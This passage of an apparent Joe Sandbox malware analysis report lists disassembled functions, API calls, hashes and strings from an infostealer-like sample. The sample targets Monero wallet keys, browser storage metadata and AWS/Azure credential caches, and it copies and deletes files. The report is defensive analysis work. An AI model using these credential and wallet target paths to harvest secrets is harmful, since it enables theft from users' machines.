                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                          • String ID: %s%s
                          • API String ID: 2672039231-3252725368
                          • Opcode ID: 7de5d08fe28c62df74405fc7e8bba144f82aa6a8a248137ebcc86198a331a6cd
                          • Instruction ID: ba2c96f53468647f5272c0333ca00d2c8fed4cfb13c6d22d7f84881df8a8af9a
                          • Opcode Fuzzy Hash: 7de5d08fe28c62df74405fc7e8bba144f82aa6a8a248137ebcc86198a331a6cd
                          • Instruction Fuzzy Hash: DEF17E72A14214EFCB10DB68DD48ADB77B9EF48300F144595F909E3291DB74AE41DFA1
                          Function 00701F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00701F9F
                          • lstrlen.KERNEL32(010D89A0), ref: 00701FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00701FE3
                          • lstrlen.KERNEL32(00731794), ref: 00701FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070200E
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00702042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070204D
                          • lstrlen.KERNEL32(00731794), ref: 00702058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00702075
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00702081
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007020AC
                          • lstrlen.KERNEL32(?), ref: 007020E4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00702104
                          • lstrcat.KERNEL32(00000000,?), ref: 00702112
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00702139
                          • lstrlen.KERNEL32(00731794), ref: 0070214B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070216B
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00702177
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070219D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007021A8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007021D4
                          • lstrlen.KERNEL32(?), ref: 007021EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070220A
                          • lstrcat.KERNEL32(00000000,?), ref: 00702218
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00702242
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070227F
                          • lstrlen.KERNEL32(010DCD40), ref: 0070228D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007022B1
                          • lstrcat.KERNEL32(00000000,010DCD40), ref: 007022B9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007022F7
                          • lstrcat.KERNEL32(00000000), ref: 00702304
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070232D
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00702356
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00702382
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007023BF
                          • DeleteFileA.KERNEL32(00000000), ref: 007023F7
                          • FindNextFileA.KERNEL32(00000000,?), ref: 00702444
                          • FindClose.KERNEL32(00000000), ref: 00702453
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                          • String ID:
                          • API String ID: 2857443207-0
                          • Opcode ID: dc0e7f45da7966c9bd93bdc05ea4b93a66ad1a508805902f9595d90440983deb
                          • Instruction ID: 47f8091e11e92e7f86c16ae984f1bca949ddd0d4e4b7134f27ee3b430bf3ae8d
                          • Opcode Fuzzy Hash: dc0e7f45da7966c9bd93bdc05ea4b93a66ad1a508805902f9595d90440983deb
                          • Instruction Fuzzy Hash: 83E13672A25616DBCB21EFA4DD8DA9E77F9AF04300F044264F805B7292DF38DD068B90
                          Function 00716410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716445
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716480
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007164AA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007164E1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716506
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071650E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FolderPathlstrcat
                          • String ID: \..\
                          • API String ID: 2938889746-4220915743
                          • Opcode ID: c8f2099d447987004c26b542343a6db1de07b919365e4941494c41532722bb09
                          • Instruction ID: 37c26d9e2509b56de16b0f45e0ad3e68fb8c0f2b2c447be3cb1a523f5cf35764
                          • Opcode Fuzzy Hash: c8f2099d447987004c26b542343a6db1de07b919365e4941494c41532722bb09
                          • Instruction Fuzzy Hash: C2F16DB1A25215DBCB21AF6CD84DAAE77F5AF44300F048168B855E72D2DB3CDD86CB90
                          Function 00714370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007143A3
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007143D6
                          • lstrcpy.KERNEL32(00000000,?), ref: 007143FE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00714409
                          • lstrlen.KERNEL32(\storage\default\), ref: 00714414
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714431
                          • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0071443D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714466
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00714471
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714498
                          • lstrcpy.KERNEL32(00000000,?), ref: 007144D7
                          • lstrcat.KERNEL32(00000000,?), ref: 007144DF
                          • lstrlen.KERNEL32(00731794), ref: 007144EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714507
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00714513
                          • lstrlen.KERNEL32(.metadata-v2), ref: 0071451E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071453B
                          • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00714547
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071456E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007145A0
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007145A7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00714601
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071462A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00714653
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071467B
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007146AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                          • String ID: .metadata-v2$\storage\default\
                          • API String ID: 1033685851-762053450
                          • Opcode ID: 43f584ff7a3b6c6fbb734cd92724a17380d10da828d95d1d1e4208bf1acbec16
                          • Instruction ID: 8f47f840205b18df25ba83dd8e2f827a2816c6f1ac35e5147ab1fee1b8ef5ac4
                          • Opcode Fuzzy Hash: 43f584ff7a3b6c6fbb734cd92724a17380d10da828d95d1d1e4208bf1acbec16
                          • Instruction Fuzzy Hash: B6B15172A25616DBCB21EF7CDD4DA9E77E9AF04700F044224B845E7292DB3CED468B90
                          Function 007157A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007157D5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00715804
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715835
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071585D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00715868
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715890
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007158C8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007158D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007158F8
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071592E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715956
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00715961
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715988
                          • lstrlen.KERNEL32(00731794), ref: 0071599A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007159B9
                          • lstrcat.KERNEL32(00000000,00731794), ref: 007159C5
                          • lstrlen.KERNEL32(010DCCB0), ref: 007159D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007159F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00715A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715A2C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715A58
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00715A5F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00715AB7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00715B2D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00715B56
                          • lstrcpy.KERNEL32(00000000,?), ref: 00715B89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715BB5
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00715BEF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00715C4C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00715C70
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2428362635-0
                          • Opcode ID: 0d7c67e3fa40a3136c41e8dded72bdfe50f9a1c01371d50bb2a191085d727c25
                          • Instruction ID: 1a197adb6d0d35deee7dfffdcf35ef224add087315a79f19bd41b93d413b49ca
                          • Opcode Fuzzy Hash: 0d7c67e3fa40a3136c41e8dded72bdfe50f9a1c01371d50bb2a191085d727c25
                          • Instruction Fuzzy Hash: 5C028271A15605DFCB25EF6CD88DAEE7BF5AF84300F044228F805A7291DB78DD868B90
                          Function 00701190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00701120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00701135
                            • Part of subcall function 00701120: RtlAllocateHeap.NTDLL(00000000), ref: 0070113C
                            • Part of subcall function 00701120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00701159
                            • Part of subcall function 00701120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00701173
                            • Part of subcall function 00701120: RegCloseKey.ADVAPI32(?), ref: 0070117D
                          • lstrcat.KERNEL32(?,00000000), ref: 007011C0
                          • lstrlen.KERNEL32(?), ref: 007011CD
                          • lstrcat.KERNEL32(?,.keys), ref: 007011E8
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070121F
                          • lstrlen.KERNEL32(010D89A0), ref: 0070122D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701251
                          • lstrcat.KERNEL32(00000000,010D89A0), ref: 00701259
                          • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00701264
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701288
                          • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00701294
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007012BA
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007012FF
                          • lstrlen.KERNEL32(010DCD40), ref: 0070130E
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701335
                          • lstrcat.KERNEL32(00000000,?), ref: 0070133D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701378
                          • lstrcat.KERNEL32(00000000), ref: 00701385
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007013AC
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 007013D5
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701401
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070143D
                            • Part of subcall function 0071EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0071EE12
                          • DeleteFileA.KERNEL32(?), ref: 00701471
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                          • String ID: .keys$\Monero\wallet.keys
                          • API String ID: 2881711868-3586502688
                          • Opcode ID: 420f4eaf067ee40a882c130aa99fd0ae0a2cecb48d3c64edda6feb5e4d47db4c
                          • Instruction ID: 69d278526d46f77214c3c9a2b5dd51bfd5bcc3f695551265e3ffdf86521b94b3
                          • Opcode Fuzzy Hash: 420f4eaf067ee40a882c130aa99fd0ae0a2cecb48d3c64edda6feb5e4d47db4c
                          • Instruction Fuzzy Hash: D8A16472A15205DBCB21EFB8DD8DA9E77F9AF44300F444224F905E7292DB78ED059B90
                          Function 0071E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0071E740
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0071E769
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E79F
                          • lstrcat.KERNEL32(?,00000000), ref: 0071E7AD
                          • lstrcat.KERNEL32(?,\.azure\), ref: 0071E7C6
                          • memset.MSVCRT ref: 0071E805
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0071E82D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E85F
                          • lstrcat.KERNEL32(?,00000000), ref: 0071E86D
                          • lstrcat.KERNEL32(?,\.aws\), ref: 0071E886
                          • memset.MSVCRT ref: 0071E8C5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0071E8F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E920
                          • lstrcat.KERNEL32(?,00000000), ref: 0071E92E
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0071E947
                          • memset.MSVCRT ref: 0071E986
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$memset$FolderPathlstrcpy
                          • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 4067350539-3645552435
                          • Opcode ID: b11e861a5ce297dda6c2525687fc73b72edaf1e3a8a165fd35a1071d9e6762f2
                          • Instruction ID: a6a547ebc90a5d9d470ed35c2ebf9c2b1724570ac02a6b6db8ffdcf180db2df3
                          • Opcode Fuzzy Hash: b11e861a5ce297dda6c2525687fc73b72edaf1e3a8a165fd35a1071d9e6762f2
                          • Instruction Fuzzy Hash: 84712DB1A50219EBD725EB68DC4AFED7374AF48700F044494BB19AB1C1DEB8AE848B54
                          Function 0071ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32 ref: 0071ABCF
                          • lstrlen.KERNEL32(010DD960), ref: 0071ABE5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AC0D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071AC18
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AC41
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AC84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071AC8E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071ACB7
                          • lstrlen.KERNEL32(00734AD4), ref: 0071ACD1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071ACF3
                          • lstrcat.KERNEL32(00000000,00734AD4), ref: 0071ACFF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AD28
                          • lstrlen.KERNEL32(00734AD4), ref: 0071AD3A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AD5C
                          • lstrcat.KERNEL32(00000000,00734AD4), ref: 0071AD68
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AD91
                          • lstrlen.KERNEL32(010DDB10), ref: 0071ADA7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071ADCF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071ADDA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AE03
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071AE3F
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071AE49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071AE6F
                          • lstrlen.KERNEL32(00000000), ref: 0071AE85
                          • lstrcpy.KERNEL32(00000000,010DDAB0), ref: 0071AEB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
